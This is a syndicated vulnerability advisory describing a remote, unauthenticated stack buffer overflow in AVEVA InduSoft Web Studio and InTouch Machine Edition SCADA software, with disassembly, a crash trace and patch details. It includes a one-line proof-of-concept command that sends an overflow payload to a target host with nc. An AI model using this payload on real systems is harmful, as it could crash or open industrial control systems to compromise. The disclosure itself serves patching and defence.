SBN

Tenable Research Advisory: Patches Issued For Critical Vulnerabilities in 2 AVEVA SCADA/OT Apps

A new critical remote code execution vulnerability in AVEVA’s Indusoft Web Studio and InTouch Machine Edition can be exploited to compromise sensitive operational technology. AVEVA has released a patch and we advise urgent attention and response from affected end users.

Tenable Research discovered a new critical remote code execution (RCE) vulnerability in AVEVA’s Indusoft Web Studio and InTouch Machine Edition. The applications contain a stack buffer overflow that can be exploited to execute arbitrary code on target systems.

These products were previously marketed under the Schneider Electric brand and are now being managed by AVEVA.

What do you need to know? Tenable Research discovered a new critical remote code execution vulnerability in AVEVA’s Indusoft Web Studio and InTouch Machine Edition.

What’s the attack vector? The vulnerability can be remotely exploited without authentication to execute arbitrary commands on the target system.

What’s the business impact? A malicious threat actor can completely compromise and gain control of the system, and use it as a pivot point to execute lateral transfer.

What’s the solution? AVEVA has released InduSoft Web Studio Hotfix 81.1.00.08 and InTouch Machine Edition Hotfix 81.1.00.08 to address this vulnerability. Affected users should urgently apply the patches.

Background

InduSoft Web Studio is a suite of tools providing automation building blocks which are used to develop human-machine interfaces (HMIs), Supervisory Control and Data Acquisition (SCADA) systems and embedded instrumentation solutions.

InTouch Machine Edition is an HMI/SCADA software toolset used to develop applications that connect automation systems and interfaces for web browsers, smartphones and tablets.

Diverse industries — including agriculture, transportation, energy, nuclear power, manufacturing, entertainment and physical security — use SCADA in conjunction with operational technology (OT). Because of their critical role in modern infrastructure and the wide range of industries that deploy them, SCADA systems have become a primary security concern and are increasingly being targeted by threat actors.

Analysis

Tenable Research found a new stack overflow vulnerability in TCPServer.dll. The vulnerability is in the code to read a ‘string’ from the received network data. This vulnerability is similar to the one we disclosed in May 2018, but is triggered through command 81 instead of  command 50.

Here’s a description of two data structures in TCPServer.dll to help you understand the vulnerability.

  1. The following object (referred here as ‘WSTR’) is used to store a wide-character string:
  2.  Class WSTR
     {
     vftable;
     unsigned short lbuf[0x40]; // local storage for the string data
     void *pData; // ptr to string data; can point to @lbuf
     int32 DataLen; // length allocated for @pData
     ...
     };
    

     When the string can fit in lbuf, it should be stored there. Otherwise, heap memory is allocated to store the string.

    1. Another object heavily used in TCPServer.dll is the ‘TcpServerThreadBuffer’ (referred to here as CBuf). This object is used to store, process and manipulate network data received from clients.
    Class CBuf
    {
     vftable;
     int32 AllocSize; // used for allocation, seen: 0x4000
     int32 CurPos; // current position
     int32 BufSize; // allocated size of @pBuffer
     void *pBuffer; // buffer holding network data; can point to @lbuf
     byte lbuf[0x100]; // local storage for network data
     ...
    };
    


    Inside the virtual function table, there are many functions used to read and write various types of command parameters (i.e., byte, boolean, short, int32 and string).

    The vulnerability can be triggered via command 81:

    [...]
    .text:5D43D8B8      xor     eax, eax
    .text:5D43D8BA      mov     [ebp+var_wstr.vftable], offset off_5D4CAD5C
    .text:5D43D8C4      mov     word ptr [ebp+var_wstr.lbuf], ax ; wstr.lbuf[0] = '\0';
    .text:5D43D8CB      mov     [ebp+var_wstr.pData], eax ; wstr.pData = NULL;
    .text:5D43D8D1      mov     [ebp+var_wstr.DataLen], eax ; wstr.DataLen = 0;
    .text:5D43D8D7      lea     ecx, [ebp+var_wstr]; a wstr object on the stack
    .text:5D43D8DD      mov     [ebp+var_4], eax
    .text:5D43D8E0      mov     eax, [edi]
    .text:5D43D8E2      push    ecx
    .text:5D43D8E3      mov     ecx, edi
    .text:5D43D8E5      call    [eax+vftCBuf.Cbuf_ReadString] ; Cbuf_ReadString
    [...]
    


    Here, the code tries to read a ‘string’ object from the network data into a WSTR object (which is on the stack). This means wstr.lbuf is a buffer on the stack.

    Inside Cbuf_ReadString(), the length of the ‘string’ object is read, and the function tries to allocate str_len + 1 to store the string:

    [...]
    .text:5D40C05D      call    Cbuf_ReadStringLength ; return  1, 2, or 4 byte(s)
    .text:5D40C062      mov     esi, [ebp+arg_sbuf]
    .text:5D40C065      mov     edi, eax ; attacker specifies length 0xffffffff
    .text:5D40C067      mov     ecx, esi
    .text:5D40C069      lea     edx, [edi+1] ; length wraps to 0 if 0xffffffff
    .text:5D40C06C      push    edx
    .text:5D40C06D      call    wstr_alloc
    [...]
    


    If the attacker specifies 0xFFFFFFFF as the string length, alloc size of 0 is passed to wstr_alloc(), which increments the size by one and checks if the size can fit in the local buffer (wstr.lbuf). Since 1 (0 + 1) is less than 0x40 (countof(wstr.lbuf)), the function returns 1 without allocating heap memory, asssuming wstr.lbuf is big enough to store the string:

    [...]
    .text:5D40BDD4      mov     edx, [ebp+arg_size]
    .text:5D40BDD7      inc     edx ; size++
    .text:5D40BDD8      push    edi
    .text:5D40BDD9      mov     edi, ecx
    .text:5D40BDDB      mov     [ebp+arg_size], edx
    .text:5D40BDDE      cmp     edx, 40h
    .text:5D40BDE1      jge     short loc_5D40BDEF
    .text:5D40BDE3      mov     eax, 1
    [...]
    


    Then Cbuf_ReadString() calls a Cbuf method to read in the string data, telling it the stack buffer has 0xffffffff bytes

    [...]
    .text:5D40C09C      push    edi ; 0xffffffff
    .text:5D40C09D      push    ecx ; stack buf
    .text:5D40C09E      mov     ecx, ebx
    .text:5D40C0A0      call    [eax+vftCBuf.ReadAndConvertToWchars] ; stack overflow!
    [...]
    


    which can cause a stack buffer overflow:

    STATUS_STACK_BUFFER_OVERRUN encountered
    (9e8.b28): Break instruction exception - code 80000003 (first chance)
    eax=00000000 ebx=5d15b708 ecx=766ce4b4 edx=0e76efb9 esi=00000000 edi=00ec2870
    eip=766ce331 esp=0e76f200 ebp=0e76f27c iopl=0         nv up ei pl zr na pe nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
    kernel32!UnhandledExceptionFilter+0x5f:
    766ce331 cc              int     3
    0:020> kb
     # ChildEBP RetAddr  Args to Child              
    00 0e76f27c 694c00f1 5d15b708 0e76f298 5d133403 kernel32!UnhandledExceptionFilter+0x5f
    *** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\InduSoft Web Studio v8.1\Bin\TCPSERVER.DLL - 
    01 0e76f288 5d133403 5d15b708 00000001 0e76f5c8 MSVCR110!__crtUnhandledException+0x14
    WARNING: Stack unwind information not available. Following frames may be wrong.
    02 0e76f298 5d13351a 5d15b708 00000010 00000044 TCPSERVER!_StudioSetLanguage__+0x1653
    03 0e76f5c8 5d0bdbff 049ecae8 049ecb18 049ecb18 TCPSERVER!_StudioSetLanguage__+0x176a
    04 0e76f7ec 00410041 00410041 00410041 00410041 TCPSERVER+0x3dbff
    05 0e76f7f0 00410041 00410041 00410041 00410041 0x410041
    06 0e76f7f4 00410041 00410041 00410041 00410041 0x410041
    07 0e76f7f8 00410041 00410041 00410041 00410041 0x410041
    [...]
    

    Proof of Concept (PoC)

    Below is the PoC to trigger the stack buffer overflow:

    cat < (echo -ne '\x02\x31\x10\x31\x10\x38\x10\x32\x10\x32\x03\x02\x51\xff\xff\xff\xff\xff\xff\xff'`python -c "print 'A'*1000"`'\x03') - | nc <target_host> 1234
    

    Business impact

    These vulnerabilities leave InduSoft Web Studio or InTouch Machine Edition server machines vulnerable to an unauthenticated remote attacker who could leverage them to execute arbitrary code, potentially leading to full system compromise. In turn, these machines could allow an attacker to move laterally within a network. Connected HMI clients and OT devices can also be exposed to attacks.

    AVEVA and Tenable consider this a critical vulnerability requiring urgent attention and response from affected end users.

    Solution

    AVEVA has released updates InduSoft Web Studio Hotfix 81.1.00.08 and InTouch Machine Edition Hotfix 81.1.00.08 to remediate this vulnerability. Update the application by applying the appropriate patches:

Additional information

*** This is a Security Bloggers Network syndicated blog from Tenable Blog authored by Tenable Research. Read the original post at: http://feedproxy.google.com/~r/tenable/qaXL/~3/AcTeBSakhIw/tenable-research-advisory-patches-issued-for-critical-vulnerabilities-in-2-aveva-scadaot-apps